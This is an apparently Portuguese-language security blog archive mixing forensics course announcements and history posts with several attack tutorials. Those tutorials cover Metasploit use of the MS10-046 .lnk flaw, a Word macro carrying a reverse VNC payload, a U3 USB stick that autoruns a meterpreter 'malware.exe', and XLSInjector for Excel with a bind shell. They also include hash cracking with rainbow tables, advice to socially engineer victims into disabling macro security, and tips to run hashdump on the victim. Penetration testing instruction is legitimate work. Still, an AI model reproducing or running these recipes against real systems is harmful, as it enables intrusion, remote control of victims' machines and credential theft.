O mais interessante da forense computacional, é que além de poder ser utilizada no trabalho como consultor e perito, também pode ser utilizada para proteger sua organização, principalmente quando existe um grupo de resposta a incidentes, com profissionais preparados para atuar na linha de frente, como equipe de resposta à ataques digitais.

Problemas concernentes à Forense Computacional

Como a forense computacional é uma área relativamente nova, até mesmo por conta do pouco tempo da popularização dos computadores, não há possibilidade de perfeição em seus métodos e formas de atuação.

Por conta disso, podemos enumerar alguns pontos falhos dessa área, que com o tempo certamente serão melhorados:

Ainda, é mais uma arte do que ciência;

Ainda está em seus estados iniciais de desenvolvimento;

Há pouco conhecimento teórico sobre o qual as hipóteses empíricas são baseadas;

Há falta de treinamento apropriado;

Não há padronização de ferramentas.

Essas são alguns dos problemas atuais dessa área. No entanto, o desenvolvimento de pesquisas na área, em pouco tempo, resolverão os mesmos.

Participação no 2º CNASI Courses & Training, em Brasília

2011-02-01T18:48:00.003-02:00

Caros,

Para quem tiver interesse na área de Forense Computacional, e estiver em Brasília no final de fevereiro, estarei por lá ministrando um curso de 6h no evento 2º CNASI Courses & Training, dia 21/02, cujo título é: "Forense Computacional com Software Livre".

Acessem a página do evento e vejam o conteúdo do curso: http://www.cnasi.com.br/training/df/

Espero encontrá-los por lá!

[ ]'s

Luiz

Rainbow Crack e Rainbow Tables

2011-01-11T16:47:00.002-02:00

RainbowCrack é um programa que gera rainbow tables para serem usadas na quebra de senhas. O RainbowCrack difere dos programas de força bruta convencionais, pois utiliza tabelas previamente criadas, chamadas rainbow tables, para reduzir drasticamente o tempo necessário para quebrar senhas.

Um ótimo programa para utilizarmos para quebrar senhas Windows com rainbow tables é o Ophcrack

#aptitude install ophcrack

Outro programa, que quebra inclusive hashs MD5, SHA1, SHA2 e etc, é o Cain (que roda em Windows).

Para baixar Rainbow Tables: http://rainbowtables.shmoo.com/

Para entender mais: http://www.ethicalhacker.net/content/view/94/24/

RainbowCrack é uma ferramenta cujo objetivo é quebrar hash de senhas.

O método utilizado pela ferramenta é o brute force. Nesse método, todas as senhas em texto plano e seus hashs correspondentes são computados um por um. O hash computado é comparado com o hash alvo. Se um deles for igual, a senha em texto plano é encontrada. Do contrário, o processo continua até finalizar todas as senhas possíveis.

No método time-memory, a tarefa de computar hashs é feita através do armazenamento dos resultados no que chamamos de "rainbow table". Depois disso, os hashes podem ser acessados a partir das rainbow tables sempre que necessário. O processo pré-computacional precisa de muito tempo para criar as chaves que serão posteriormente utilizadas. No entanto, uma vez que esse processo tenha terminado, a performance da rainbow tables pode ser de centenas a milhares de vezes maior do que o método de brute force.

Vamos ver passo a passo como utilizar o software RainbowCrack. Esse software inclui três ferramentas que devem ser usadas em sequência para fazer a coisa funcionar:

Passo 1: usar o rtgen para gerar as rainbow tables.

Passo 2: usar o rtsort para organizar as rainbow tables geradas pelo rtgen.

Passo 3: usar o rcrack para buscar o conteúdo das rainbow tables organizadas pelo rtsort.

O processo de buscar o conteúdo no passo final, é equivalente ao processo de quebra de hash. E todas essas ferramentas são utilizadas através da linha de comando.

O programa rtgen precisa de diversos parâmetros para gerar uma rainbow table, e a sintaxe do comando é:

rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Explicação dos parâmetros:

hash_algorithm

O algoritmo dos hashs (lm, ntlm, md5 e assim por diante) usado na rainbow table.

charset

A configuração dos caracteres (charset) do texto plano na rainbow tables. Todos os charsets possíveis estão definidos no arquivo charset.txt.

plaintext_len_min

plaintext_len_max

Estes dois parâmetros definem o tamanho possível de todo o texto plano na rainbow tables. Se o charset é numérico, o plaintext_len_min é 1, e o plaintext_len_max é 5, então a string "12345" será incluída na tabela, mas "123456" não.

table_index

chain_len

chain_num

part_index

Estes quatro parâmetros são mais difíceis de explicar em poucas palavras. Ler e compreender o artigo original de Philippe Oechslin (criador do RainbowCrack), pode ajudar a entender o significado exato.

O table_index está relacionado ao "reduce function" que é utilizado na rainbow table.

O chain_len é o tamanho de cada "rainbow chain" na rainbow table. Uma "rainbow chain" configurada como 16 bytes é a menor unidade em uma rainbow table. Uma rainbow tables contém diversas rainbow chains.

O chains_num é o número de rainbow chains em uma rainbow table.

O parâmetro part_index determina como o "start point" em cada rainbow chain é gerado. Deve ser um número (ou começar com um número).

Os valores corretos de todos os parâmetros dependem do que vocês precisa, e selecionar bons parâmetros requer um bom entendimento do algoritmo de time-memory tradeoff.

Uma configuração que funciona está logo abaixo, como um exemplo:

hash_algorithm

lm, ntlm or md5

charset

alpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] ou

loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]

plaintext_len_min

1

plaintext_len_max

7

chain_len

3800

chain_num

33554432

key space

36^1 + 36^2 + 36^3 + 36^4 + 36^5 + 36^6 + 36^7 = 80603140212

Key space é o número de possíveis strings em texto plano para o charset, plaintext_len_min e plaintext_len_max selecionados.

table size

3 GB

success rate

0.999

O algoritmo de time-memory tradeoff é um algoritmos probabilístico. Qualquer que seja os parâmetros selecionados, há sempre probabilidade de que as strings dentro do charset selecionado e o tamanho das strings não seja completamente coberto. A taxa de sucesso é de 99.9% com os parâmetros usados nesse evento.

comandos para gerar as tabelas

Os comandos do rtgen usados para gerar as rainbow tables são:

rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0

rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0

rtgen md5 loweralpha-numeric 1 7 2 3800 33554432 0

rtgen md5 loweralpha-numeric 1 7 3 3800 33554432 0

rtgen md5 loweralpha-numeric 1 7 4 3800 33554432 0

rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0

Se precisar criar uma tabela de hashes ntlm ou lm, substitua o "md5" nos comandos acima por "ntlm" ou "lm".

Se precisar de uma tabela com o charset alpha-numeric, substitua o "loweralpha-numeric" nos comandos acima por "alpha-numeric".

Se uma tabela com hashes lm for criada, tenha certeza de que seu charset seja alpha-numeric ao invés de loweralpha-numeric. O algoritmo lm nunca utiliza caracteres minúsculos como strings.

Agora é hora de criar uma rainbow table.

Altere o diretório corrente em seu terminal de comando para o diretório do RainbowCrack, e execute o comando seguinte:

# cd /pentest/passwords/rcrack

# rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0

Esse comando leva 4 horas para ser completado em um computador com um processador Core2 Duo E7300. É possível parar a execução do mesmo a qualquer momento pressionando Ctrl+C. Da próxima vez que o comando for executado com a mesma linha de comando, ele continuará a partir do ponto em que foi interrompido para continuar com a geração da tabela.

Quando o comando tiver terminado, um arquivo com o nome de "md5_loweralpha-numeric#1-7_0_3800x33554432_0.rt" e tamanho de 512 MB será criado. O nome do mesmo é simplesmente a linha de comando utilizada com os parâmetros interligados, com a extensão "rt". O programa rcrack que será explicado mais a frente, precisa dessas informações para saber quais os parâmetros existentes na rainbow table. Portanto, não renomeie o arquivo.

As demais tabelas podem ser geradas da mesma forma, com os comandos:

# rtgen md5 loweralpha-numeric 1 7 1 3800 33554432 0

# rtgen md5 loweralpha-numeric 1 7 2 3800 33554432 0

# rtgen md5 loweralpha-numeric 1 7 3 3800 33554432 0

# rtgen md5 loweralpha-numeric 1 7 4 3800 33554432 0

# rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0

Finalmente, esses arquivos são gerados:

md5_loweralpha-numeric#1-7_0_3800x33554432_0.rt 512MB

md5_loweralpha-numeric#1-7_1_3800x33554432_0.rt 512MB

md5_loweralpha-numeric#1-7_2_3800x33554432_0.rt 512MB

md5_loweralpha-numeric#1-7_3_3800x33554432_0.rt 512MB

md5_loweralpha-numeric#1-7_4_3800x33554432_0.rt 512MB

md5_loweralpha-numeric#1-7_5_3800x33554432_0.rt 512MB

Agora, o processo de criação da rainbow table está completo.

As rainbow tables geradas pelo programa rtgen precisam de um pós-processamento para tornar sua consulta mais fácil e rápida. O programa rtsort é utilizado para organizar todas as rainbow chains em uma rainbow table.

Utilize os seguintes comandos:

# rtsort md5_loweralpha-numeric#1-7_0_3800x33554432_0.rt

# rtsort md5_loweralpha-numeric#1-7_1_3800x33554432_0.rt

# rtsort md5_loweralpha-numeric#1-7_2_3800x33554432_0.rt

# rtsort md5_loweralpha-numeric#1-7_3_3800x33554432_0.rt

# rtsort md5_loweralpha-numeric#1-7_4_3800x33554432_0.rt

# rtsort md5_loweralpha-numeric#1-7_5_3800x33554432_0.rt

Cada comando acima, leva cerca de 1 a 2 minutos para completarem sua execução. O programa rtsort gravará a rainbow table organizada por sobre o arquivo orginal. Não interrompa a execução do comando, do contrário o arquivo original será danificado.

Agora o processo de organização das rainbow tables está completo.

O programa rcrack é utilizado para acessar as rainbow tables. Ele aceita apenas rainbow tables organizadas.

Assumindo que as rainbow tables organizadas estejam no mesmo diretório do programa, para quebrar hashes únicos a linha de comando será:

# rcrack *.rt -h aqui_vai_o_hash_para_ser_quebrado

O primeiro parâmetro especifica o caminho para buscar nos arquivos das rainbow tables. Os caracteres "*" e "?" podem ser usados para especificar vários arquivos.

Normalmente isso leva algumas dezenas segundos para finalizar, se a string existir dentro do "range" do charset e tamanho de strings selecionados. Do contrário, leva-se muito mais tempo para buscar por todas as tabelas, apenas para não encontrar nada.

Para quebrar múltiplos hashs, coloque todos os hashs em um arquivo de texto, com um hash por linha. E então especifique o nome do arquivo na linha de comando do programa rcrack:

# rcrack *.rt -l arquivo_com_lista_de_hashes

Se as rainbow tables que gerou usam o algoritmo lm, o programa rcrack possui um suporte especial para o parâmetro "-f". Um arquivo de dump de hash no formato pwdump é necessário como input para o programa rcrack. O conteúdo do arquivo parecerá com o seguinte:

Administrator:500:1c3a2b6d939a1021aad3b435b51404ee:e24106942bf38bcf57a6a4b29016eff6:::

Guest:501:a296c9e4267e9ba9aad3b435b51404ee:9d978dda95e5185bbeda9b3ae00f84b4:::

O arquivo pwdump é a saída de utilitários tais como pwdump2, pwdump3 ou outros. E contém os hashes tanto lm quant ntlm.

Para quebrar hashes lm em arquivos pwdump, use o seguinte comando:

# rcrack *.rt -f arquivo_pwdump

O algoritmo de hash lm converte todas as letras minúsculas em strings maiúsculas; como resultado disso, todas as strings quebradas através do hashe lm, nunca contém letras minúscula, enquanto que a string original poed conter letras minúsculas. O programa rcrack tentará corrigir isso em hashes ntlm armazenados no mesmo arquivo e exibir a string original.

Forense Computacional - Conceitos Iniciais - Parte 1

2011-01-04T23:44:00.001-02:00

Para compreendermos o que é a ciência forense, é interessante que saibamos um pouco de sua história, como surgiu e suas diversas utilizações ao longo dos períodos históricos.

História

No século 19, surge um dos primeiros pesquisadores, Francis Galton, que elabora um estudo complexo sobre as impressões digitais.

Tal estudo serve como base para as investigações que diferenciam um ser humano do outro, baseado em uma característica única que não se repete. O grande problema, é que após algumas décadas, descobriu-se que pelo menos 5% da população mundial não possui digitais, seja por problemas genéticos, seja por suas atividades profissionais que fazem com que as digitais de uma pessoa se desgaste com o tempo, tais como: professores(as), pedreiros, faxineiras(os) e pessoas que manipulam produtos químicos abrasivos.

Já no início do século 20, o cientista Leone Lattes descobre que os tipos sanguíneos podem ser divididos em grupos de acordo com características próprias. E a partir de sua pesquisa surgem os grupos A, B, AB e O. Isso auxilia na ciência forense quando há cenas de crimes envolvendo sangue, o que já permite diminuir a quantidade de suspeitos, puramente a partir de uma análise do tipo sanguíneo.

Também no início do século 20, Calvin Goddard desenvolve um estudo sobre a comparação entre projéteis de armas de fogo o que possibilita a detecção da arma que disparou o projétil existente em uma cena onde há a necessidade de uma análise forense. Esse estudo torna-se um marco para a solução de inúmeros casos julgados em um tribunal.

No mesmo período, Albert Osborn desenvolve uma pesquisa sobre as características e metodologias para análise de documentos, o que pode comprovar fraudes, falsificações e veracidade dos mesmos.

Outro cientista que nessa mesma época contribui com seus estudos para a área de forense é Hans Gross, que desenvolve o método científico para a realização de investigações criminalísticas.

E em 1932, no FBI, um laboratório foi organizado para prover serviços de análise forense a todos os agentes de campo e outras autoridades legais de todo os EUA.

Todos esses estudos, pesquisas e desenvolvimentos, se devem aos esforços de cientistas que atuavam na área da ciência forense ou não, mas que de alguma forma suas descobertas contribuíram para o avanço no trabalho dos profissionais de gerações posteriores.

Tanto que, mesmo após um século dos primeiros estudos, as bases e conceitos desenvolvidos por esses pioneiros continuam atuais e amplamente utilizadas ao longo de um processo de análise. A única diferença são os equipamentos utilizados.

No entanto, a maioria dos conceitos e métodos permanecem os mesmos.

Isso só começa a mudar com o advento da informática e o crescente nível de importância da informação no contexto da atualidade. Essas mudanças surgem, por conta de um novo paradigma, onde os crimes são realizados de uma outra maneira e as cenas não são mais aquelas tradicionais, com sangue, fios de cabelo e fluidos corporais. E as vítimas não são mais os corpos físicos dos denunciantes, mas suas identidades e vidas virtuais.

Definição. Uma excelente definição que pode esclarecer o que é a ciência forense é a que se segue, retirada do livro “Handbook of Forensic Pathology College of American Pathologists”, de 1990:

“Aplicação da ciência física à lei na busca pela verdade em assuntos civis, criminais e de comportamento social, com o fim de que nenhuma injustiça seja feita à nenhum membro da sociedade”.

E ainda podemos acrescentar que o objetivo básico da mesma é a determinação do valor das evidências relacionadas à cena de um crime.

No entanto, com o passar do tempo, as cenas de crime mudaram e os objetos relacionados ao mesmo deixaram de ser capuzes, armas de fogo, carros em disparada e projéteis recolhidos no local comprometido.

Os artefatos utilizados em um crime tornaram-se mais sofisticados e um criminoso não precisa mais sair do conforto de seu lar para causar milhões de prejuízos às suas vítimas. Não temos mais sangue envolvidos numa cena de um crime, apenas 0’s e 1’s, ou seja, bits.

Escrima

2010-12-21T10:40:00.006-02:00

Eskrima , Escrima ou Escryma se refere a uma categoria de Artes Marciais Filipinas (do inglês Filipino Martial Arts - FMA) que priorizam o treino de luta com armas (principalmente bastão, espada e Faca), e também ensinam habilidades de luta à mão vazia, que são essenciais num combate em que seu oponente esteja armado e você desarmado. Outros termos também comumente utilizados para se referir a esta arte são Kali e Arnis de Mano (chicote com as mãos). Eskrima e Arnis estão entre os muitos termos utilizados nas Filipinas para se referir a esta arte.

Origem: Wikipedia

Sei que esse post é um pouco fora de contexto, mas decidi postá-lo mesmo assim. Essa é uma faceta do profissional de segurança que poucos conhecem, que além de tudo ainda é psicoterapeuta e instrutor de artes marciais ;-)

O trecho acima, retirado da wikipedia, é sobre uma das artes marciais da qual sou instrutor: Escrima, ou Eskrima. Além dessa, ainda sou instrutor de WingTsun, como alguns que me conhecem já sabem.

Hoje, portanto, gostaria de postar algumas fotos de um treino que ministrei no RJ, na Quinta da Boa Vista, de Escrima. Seguem abaixo:

Atacando máquinas Windows (XP, Vista, 7, 2003, 2008) através de um webserver falso

2010-12-03T14:21:00.001-02:00

Essa exploração baseia-se na falha existente no Windows, em todas as suas versões, no que diz respeito a manipulação de arquivos .lnk. Essa falha, assim como seu exploit tornaram-se públicos no final de na segunda quinzena de julho/2010.

O mais interessante, é que após tornar pública a falha, e consequentem ente o exploit, que surgiu um dia depois da divulgação da falha por parte da Microsoft, a correção da mesma só foi sair quase um mês depois, deixando milhões de máquinas vulneráveis a esse simples, mas devastador ataque.

Vamos lá...

# ./msfconsole

O primeiro comando seleciona o exploit que será usado:

> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Caso queiramos mais informações sobre o exploit e sua respectiva falha, podemos digitar o seguinte comando:

> info

Esse comando exibirá, além da informações sobre a falha, as opções que precisamos configurar para o correto funcionamento do exploit. As opções obrigatórias são: SRVHOST, SRVPORT

Vamos configurá-las:

> set SRVHOST 192.168.0.83

Esse último comando, permitirá configurarmos o IP no qual o servidor web falso será montado para que a vítima acesso-o. No comando abaixo, vamos configurar a porta na qual o servidor ficará escutando, à espera de uma conexão:

> set SRVPORT 80

Havendo configurado a parte básica do exploit, precisamos configurar o que ele fará após explorar a falha no navegador da vítima, isso é, o payload:

> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.83

> set LPORT 4444

Tudo configurado, funcionando bem, sem nenhum erro, simplesmente lançamos o exploit e aguardamos a vítima conectar em nosso servidor falso:

> exploit

Para conseguirmos que a vítima conecte, nada como um bom e velho ataque de engenharia social :-)

De forma mais ilustrativa, vocês podem assistir ao vídeo que gravei para minha apresentação da palestra sobre "Ferramentas Livres para Teste de Invasão", que ocorrei na 11ª edição do FISL, em julho/2010. O mais legal é que apresentei a falha no dia seguinte em que a mesma foi publicada, por isso verão que no vídeo o nome do exploit ainda não possui o nome final, que o que está no texto, por isso, sigam o que está no artigo:

Metasploit com Microsoft Word

2010-11-06T14:36:00.002-02:00

Para demonstrar as falhas de segurança dos usuários, um teste de conceito simples e eficaz que pode ser feito é incluir um payload do Metasploit dentro de um arquivo do Word.

Em três passos simples, vamos criar um payload no Metasploit como uma macro do Visual Basic, em seguida, vamos inserir a macro em um arquivo do Word e, finalmente, vai vamos deixar a máquina escutando à espera de uma conexão reversa que deve ser feita quando a vítima abrir o arquivo.

1. Gerar o Payload

Selecionamos como payload uma conexão reversa de VNC, que se conecta ao IP "10.10.10.10" na porta "443"

./msfpayload windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 V > payload.bas

Não é necessário que a vítima tenha instalado um servidor VNC, mas sim que o atacante tenha o vncviewer instalado. Se não, basta executar no terminal o comando:

#apt-get install vncviewer

2. Embutimos a macro

Temos que separar o arquivo payload.bas em duas partes que estão claramente divididos dentro do mesmo, de um lado o código de macro e do outro os dados do payload.

Primeiro, vá em "Ferramentas -> Macro -> Editor do Visual Basic". Em seguida vá em "Arquivo -> Importar Arquivo" e ali selecionamos o arquivo que dividimos previamente com o código da macro.

Se quisermos verificar se o código da macro foi carregado com êxito, vamos ao menu do lado esquerdo, e na pasta "Módulos" deve encontrar o "Módulo 1" com o nosso código. Ao dar duplo clique em "Módulo 1" o código aparece carregado.

Feche o "Editor do Visual Basic", e no final do conteúdo do Word, copiamos os dados do payload.

3. Ouvindo a Conexão Reversa

No final, deixamos nossa máquina ouvindo à espera da conexão reversa via VNC, que será criada quando a vítima abrir o arquivo do Word.

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=10.10.10.10 LPORT=443 E

Se não queremos o Shell de boas vindas do Metasploit, que é um terminal DOS de cor azul, devemos agregar o seguinte parâmetro ao comando anterior:

"DisableCourtesyShell=True"

Para finalizar, em u ataque real ninguém vai utilizar o VNC como payload, porque obviamente a vítima perceberá que tomamos o controle de seu PC, mas por outro lado, é muito efetivo para realizar demonstrações práticas para a gerência de uma empresa ;-)

2010-10-24T11:30:00.000-02:00

1 - O Ataque

Em 4 passos simples iremos construir um pendrive USB U3, de modo que quando conectado a um PC, realize uma conexão reversa com o Meterpreter.

A idéia é gerar, com o Metasploit, um arquivo executável com um payload para gerar uma conexão reversa ao conectar o pendrive na USB do PC. Para gravar o payload dentro do U3, usaremos o programa Universal Customizer.

1. Gerar o payload com o Metasploit

Neste caso vamos criar um executável com uma conexão reversa do Meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Obviamente que podemos utilizar qualquer payload, como também utilizar encoders para tornar mais difícil sua detecção por antivírus.

2. Criar nossa ISO

Uma vez que tenhamos baixado e descompactado o Universal Customizer (http://www.hak5.org/packages/files/Universal_Customizer.zip), copiamos o arquivo malware.exe para o diretório "U3CUSTOM" e criamos o arquivo "autorun.inf" com o seguinte conteúdo:

[AutoRun]

open=malware.exe

Após isso, executamos o "ISOCreate.cmd" e dentro do diretório "BIN" será criada nossa ISO com o nome "U3CUSTOM.ISO". Se não criarmos nossa ISO , o Universal Customizer utilizará a ISO "U3CUSTOM.ISO" que já vem dentro do pacote, com uma versão feita por Hacksaw.

3. Gravar a ISO

Iniciamos o Universal Customizer e vamos seguindo os passo:

Ao finalizar, retiramos o pendrive, e quando voltarmos a conectá-lo já teremos nosso payload sendo executado.

4. Aguardando a conexão reversa

Para finalizar, devemos deixar o meterpreter "escutando" à espera da conexão reversa que será feita pelo payload gravado no pendrive:

./msfconsole

use exploit/multi/handler

set PAYLAOD windows/meterpreter/reverse_tcp

set LHOST 1.1.1.1

set LPORT 443

set ExitOnSession false

exploit -j

Isso é tudo, que serve inclusive como uma prova de conceito para comprovar a segurança da máquina de um usuário.

LINKS RELACIONADOS:

http://www.infoseczen.com/?p=127

http://www.slideshare.net/seguinfo/sallis-usb-hacks

http://www.hak5.org/packages/files/Universal_Customizer.zip

Série "Crime na Rede", na rede Record

2010-10-20T19:30:00.002-02:00

Caros,

Dia 18/10 começou uma série chamada Crime na Rede na Record, e no segundo dia foi exibida uma reportagem onde falo rapidamente e uma de minhas aulas foi filmada, onde inclusive um aluno comenta sobre um caso de invasão no site de sua empresa.

Para quem quiser conferir, segue o link:

http://noticias.r7.com/tecnologia-e-ciencia/noticias/veja-como-as-vitimas-se-defendem-dos-hackers-20101019.html

[ ]'s

XLSInjector - Saiba como injetar um Shell Meterpreter em arquivos Excel

2010-10-11T22:24:00.009-03:00

Nesse artigo entenderemos como é possível utilizar a ferramenta XLSInjector, juntamente com o Metasploit, para criar arquivos do Excel que carregam shellcode e conseguirmos uma conexão remota com a máquina alvo.

1 - Preparação

Não é um segredo para ninguém que a suíte de programas para escritório mais utilizada no mundo é o Microsoft Office, possuindo a maior fatia do mercado em sistemas operacionais Windows e Mac. Desta suíte, os programas mais utilizados são Microsoft Word, Microsoft Excel e Microsoft Power Point, que quase sempre estão instalados na maioria dos computadores.

Nesse artigo vamos tratar do XLSInjector, uma ferramenta criada por Keith Lee que permite injetar em um arquivo do Microsoft Excel um console meterpreter (executado totalmente na memória ram, sem criar nenhum processo adicional), permitindo-nos acessar o mesmo remotamente a partir da porta 4444 e ganhar controle total da máquina.

Para que o XLSInjector funcione adequadamente, precisamos do seguinte ambiente configurado:

Uma máquina (virtual ou real) com Windows
Microsoft Excel
Perl
O módulo Win32:OLE para Perl
Um arquivo XLS para infectar
XLSInjector
e por último, o Metasploit Framework

Depois de configurar todos os elementos necessários para o correto funcionamento do XLSInjector, passamos para a execução, que é bem simples:

# perl xlsinjector.pl -i ArquivoDoExcel.xls -o ArquivoComShellDoExcel.xls

Mas nem tudo é tão simples com essa ferramenta, pois o XLSInjector NÃO consegue burlar os filtros de scripts existentes na suíte Microsoft e, justo por isso, é necessário convencer, por meio de engenharia social, ou qualquer outra técnica, que o usuário desabilite as configurações de segurança de macros e que "confie" no arquivo, o que é um pouco complicado, mas que certamente com um pouco de persuasão é possível conseguir.

Supondo que já realizou as configurações necessárias para o correto funcionamento do XLSInjector, vamos acessar remotamente nossa shell meterpreter através do console do Metasploit Framework.

Iniciamos o console do Metasploit:

# ./msfconsole

Uma vez que o console MSF esteja aberto, carregamos o payload do meterpreter:

set payload windows/meterpreter/bind_tcp

Configuramos o payload corretamente, com seus parâmetros:

set RHOST ip_da_vitima
set RPOT 4444

E executamos:

exploit

Com esses passos simples temos à nossa disposição uma shell meterpreter na máquina remota. Temos que ter em mente que uma shell meterpreter é diferente de uma shell de um sistema operacional, e que possui seu próprio conjunto de comando, que pode ser listado simplesmente digitando na shell "?" e pressionando enter. Com esse comando, terá em sua tela algo parecido com isso:

Core Commands

Command	Description
?	Help menu
channel	Displays information about active channels
close	Closes a channel
exit	Terminate the meterpreter session
help	Help menu
interact	Interacts with a channel
irb	Drop into irb scripting mode
migrate	Migrate the server to another process
quit	Terminate the meterpreter session
read	Reads data from a channel
run	Executes a meterpreter script
use	Load a one or more meterpreter extensions
write	Writes data to a channel

Stdapi: File system Commands

Command	Description
cat	Read the contents of a file to the screen
cd	Change directory
download	Download a file or directory
edit	Edit a file
getlwd	Print local working directory
getwd	Print working directory
lcd	Change local working directory
lpwd	Print local working directory
ls	List files
mkdir	Make directory
pwd	Print working directory
rmdir	Remove directory
upload	Upload a file or directory

Stdapi: Networking Commands

Command	Description
ipconfig	Display interfaces
portfwd	Forward a local port to a remote service
route	View and modify the routing table

Stdapi: System Commands

Command	Description
execute	Execute a command
getpid	Get the current process identifier
getuid	Get the user that the server is running as
kill	Terminate a process
ps	List running processes
reboot	Reboots the remote computer
reg	Modify and interact with the remote registry
rev2self	Calls RevertToSelf() on the remote machine
shutdown	Shuts down the remote computer
sysinfo	Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command	Description
idletime	Returns the number of seconds the remote user has been idle
uictl	Control some of the user interface components

Priv: Password database Commands

Command	Description
hashdump	Dumps the contents of the SAM database

Priv: Timestomp Commands

Command	Description
timestomp	Manipulate file MACE attributes

2 - Finalização

É sempre bom ressaltar a potência e a capacidade do meterpreter para injetar dll's, fazer upload de arquivos, executar scripts e etc. Recomendo que dê uma lida no documento Metasploit's Meterpreter para saber mais sobre os comandos do meterpreter.

Recomendo também utilizar o comando "migrate" tão logo possa, ao conseguir o shell com a máquina alvo, para evitar que assim que fecharem o arquivo XLS, sua conexão também seja encerrada. Outro comando recomendado é o hashdump, que retorna o conteúdo do arquivo SAM da máquina vítima, para que posteriormente se possa obter a senha dos usuários e administradores, utilizando ferramentas como l0phtcrack ou cain&abel.

Por último, deixo abaixo o vídeo do autor da ferramenta XLSInjector, onde ensina o seu funcionamento:

Injecting Meterpreter into Excel files using XLSInjector

Entrevista no Correio Brasiliense

2010-10-11T16:08:00.002-03:00

Caros,

Para quem tiver interesse, participei de uma entrevista no Jornal Correio Brasiliense, cujo título é "Problemas na segurança na web geram dor de cabeça para usuários e empresas".

Outros profissionais, como Ulisses de Castro, participaram de entrevista :-)

Vale a pena dar uma conferida!

[ ]'s

Pesquisa para primeiro videocast

2010-10-05T15:38:00.002-03:00

Caros,

Acabei de postar no lado direito da página, uma enquete para que votem, definindo o assunto que será abordado em nosso primeiro videocast, lançado (espero) ainda em outubro.

As letras das opções não estão muito bem visíveis, por conta da cor de fundo do layout, mas basta selecionar as opções com o mouse que é possível ler cada uma delas e escolher uma.

Espero a ajuda de vocês, para definirmos em conjunto o assunto que vai inaugurar nosso primeiro videocast sobre segurança da informação.

Abraços!

Malware Network

2010-10-05T09:08:00.000-03:00

Cursos presenciais: Teste de Invasão & Forense Digital

2010-09-24T15:26:00.006-03:00

Pessoal, para quem se interessa em teste de invasão e gostaria de fazer um curso do tipo, ministrarei na semana que vem (27/09 à 01/10) o curso de Teste de Invasão em Redes Corporativas na 4Linux em SP.

E para quem achar muito em cima ou não conseguir vaga (acho que a turma já está lotada mesmo), haverá uma outra oportunidade de um curso presencial de 06 à 10/12, também na 4Linux em SP.

A ementa do curso é a mesma que está no link:
http://hackproofing.blogspot.com/2010/07/curso-pen-test-teste-de-invasao-em.html

E outra novidade: de 29/11 à 03/12, ministrarei o curso de forense digital na 4Linux, porém esssa turma já está lotada há meses :-)

Mas quem tiver interesse no curso de forense, vamos abrir uma outra turma, excepcionalmente, de 13 à 17/12 na 4Linux.

O conteúdo do curso de forense digital é o seguinte:

Conceitos Iniciais
O que é forense
Forense digital
Forense Computacional
Crime Cibernético
Papel do Investigador

Laboratório Forense
Organização do laboratório
Equipamento
Criação de toolkits

Investigação Forense
Investigação forense computacional
Passos da Investigação
Coleta de dados
O que fazer inicialmente?
Voláteis
Não-voláteis
Análise de memória física
Duplicação de dados
Recuperação de arquivos e partições deletadas
Processo de boot do Linux, Windows e Macintosh

Ataques por meios computacionais
Servidores e Clientes de e-mails
Investigando os crimes e as violações de e-mails
Como lidar com o spam
Investigando ataques de DoS
Investigando ataques de Web

Resposta à Incidentes
Criação de de CSIRT's
Avaliação de risco
Escrita de relatórios forenses
Aspectos legais

Ferramentas Livres
Distribuições
Ferramentas

Forense em máquinas virtuais
Virtualização
Cloud Computing

Forense em Linux
Boot no Linux
Sistema de arquivos
Ext2 e Ext3
Estudo de caso: Sistema Linux comprometido

Forense em Windows
Boot no Windows
Sistema de arquivos
FAT e NTFS
Estudo de caso: Honeypot Windows comprometido

Anti-Forense
Conceito
Métodos
Criptografia
Rootkits
Ferramentas

Engenharia Reversa e Análise Malware
Engenharia Reversa Básica
HT Editor e Evans Debugger
Descoberta e coleta de malware
Montagem de lab. para análise
Análise de arquivo suspeitos
Estudo de caso: análise forense de malwares do tipo banking
Estudo de caso: análise forense de binário capturado (com engenharia reversa)

Imagens digitais e esteganografia
Categorias de esteganografia
Ferramentas
Detecção de esteganografia
Ocultando informações em pacotes de rede
Quebra de senhas

Investigando tráfego de rede
Modelo OSI
Endereçamento e NAT
Ferramentas de coleta de informações de rede
Snort
Roteadores
Investigando os roteadores
Análise de tráfego de redes
Busca por evidências
Estudo de caso: análise de ataques à browsers
Estudo de caso: análise de tráfego de rede com strings de ataque

Forense em VoIP
Protocolos
Tráfego de rede VoIP
Estudo de caso: análise forense de tráfego VOIP

Mídias digitais
Smartcards
Pendrives
CD-Rom
DVD
Blue-Ray
RAID

Dispositivos Móveis
PDAs
Ipods
Smartphones
Forense em Iphone
PS3
Estudo de caso: análise forense de memória de PS3

Simulado Forense e Estudos de caso

O simulado é um conjunto de perguntas que podem estar na prova de certificação CHFI e GCFA.

Os estudos de casos são imagens que serão analisadas pelos alunos. Caso reais ou próximos dos reais, onde o aluno terá uma situação, alguns dados e perguntas para responder. Todos são baseados em desafios desenvolvidos por profissionais internacionais reconhecidos na área de forense digital.

Quem tiver interesse em qualquer um dos cursos, pode conseguir informações pelo (11) 2125-4747 ou pelo site www.4linux.com.br.

Abraço!

Novidades no blog

2010-09-14T07:04:00.002-03:00

Caros, em breve teremos algumas novidades no blog, que surgiram a partir de projetos pessoais na área de segurança da informação.

A idéia é, a partir desse blog, transformá-lo em fonte de vídeos sobre segurança da informação. Inicialmente serão vídeos semanais, com duração de 5 minutos apenas, onde falarei sobre um tema específico relacionado à área.

Espero que com isso, sejamos pioneiros nessa ação, pois até hoje só encontrei blogs que fazem isso lá fora.

Penso que meus dois únicos problemas para realizar essa idéia são:

1º - falta de tempo (mas contornarei isso mesmo que tenha que fazer os vídeos de madrugada hehehehe);

